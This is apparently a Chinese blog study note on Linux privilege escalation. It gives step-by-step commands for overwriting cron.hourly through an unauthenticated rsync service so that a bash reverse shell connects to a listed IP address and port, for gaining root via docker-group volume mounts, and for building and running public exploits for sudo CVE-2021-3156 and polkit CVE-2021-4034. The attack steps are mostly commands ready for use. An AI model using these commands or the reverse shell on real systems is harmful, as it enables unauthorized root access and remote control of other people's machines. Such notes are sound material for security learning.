web-105linux权限提升

rsync未授权本地覆盖

Rsync 是 linux 下一款数据备份工具,默认开启 873 端口

https://vulhub.org/#/environments/rsync/common/

借助 Linux 默认计划任务调用/etc/cron.hourly,利用 rsync 连接覆盖

前提条件就是需要知道rsync的密码或者存在未授权

-提权过程:
1、创建一个 nc 文件,内容
#!/bin/bash
/bin/bash -i >& /dev/tcp/47.94.236.117/3333 0>&i
2、赋予执行权限:
chmod +x nc
3、上传nc覆盖定时任务目录下
rsync -av nc rsync://47.94.236.117:873/src/etc/cron.hourly
3.1、下载文件
rsync -av rsync://47.94.236.117:873/src/etc/passwd ./
4、进行 nc 监听相应的端口
nc -lvnp 3333

Docker组用户挂载

前提 本地用户 且本地用户属于docker组

因为只有是在docker组里面我们才可以进行使用docker的权限

使用命令 groups 组名来查看 如果不是root权限但是你是docker组里面的你也可以运行docker服务,运行时为sudo也就是root权限,继而进行提权;

-复现:创建用户归类目录,添加到 docker 组
useradd -d /home/test -m test
passwd test
usermod -G docker test
newgrp docker
-利用:
docker run -v /root:/mnt -it alpine
主要的作用是:从 Docker 上面下载 alpine 镜像,然后运行;
-v 将容器外部的目录/root 挂载到容器内部/mnt,使用-it 参数进入容器 shell。

执行后root目录内容会被该再到mnt下

测试后发现提权所用到的命令其目录并不受限制,可以把 docker run -v /root:/mnt -it alpine

更改为docker run -v /home:/tmp-it alpine 同样提权成功,因为所利用到的只不过是下载一个alpine文件,去使用docker这个功能即可 然后-it提供一个shell环境

SUDO(CVE-2021-3156)

sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1

下载exp
git clone https://github.com/blasty/CVE-2021-3156.git
进入目录后编译
cd CVE-2021-3156 
make
给与执行权限
chmod a+x sudo-hax-me-a-sandwich
选择对应的版本并运行
./sudo-hax-me-a-sandwich 1

选择版本

执行后界面

Polkit(CVE-2021-4034)

polkit是什么,是系统预装工具

polkit 是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯:控制决策集中在统一的框架之中,决定低优先级进程是否有权访问高优先级进程。
漏洞版本是2009年之后的所有版本都有,ubuntu的测试查看语句为dpkg -l policykit-1,centos的是rpm -qa polkit 这样来进行查看

没有漏洞

有漏洞

版本漏洞直接下载对应的exp然后编译执行即可

相关推荐
mingzhi6120 小时前
渗透测试-快速获取目标中存在的漏洞(小白版)
安全·web安全·面试·职场和发展
安胜ANSCEN1 天前
加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
网络·安全·web安全·威胁检测·自动化响应
超栈1 天前
蓝桥杯-网络安全比赛题目-遗漏的压缩包
前端·网络·sql·安全·web安全·职场和发展·蓝桥杯
黑龙江亿林等级保护测评1 天前
DDOS防护介绍
网络·人工智能·安全·web安全·智能路由器·ddos
kali-Myon1 天前
NewStarCTF2024-Week5-Web&Misc-WP
前端·python·学习·mysql·web安全·php·web
知孤云出岫1 天前
网络安全渗透实际案例
安全·web安全
文人sec1 天前
泷羽sec学习打卡-shodan扫描4
网络·学习·安全·web安全
Wh1teR0se2 天前
ctfshow(162)--文件上传漏洞--远程文件包含
web安全·网络安全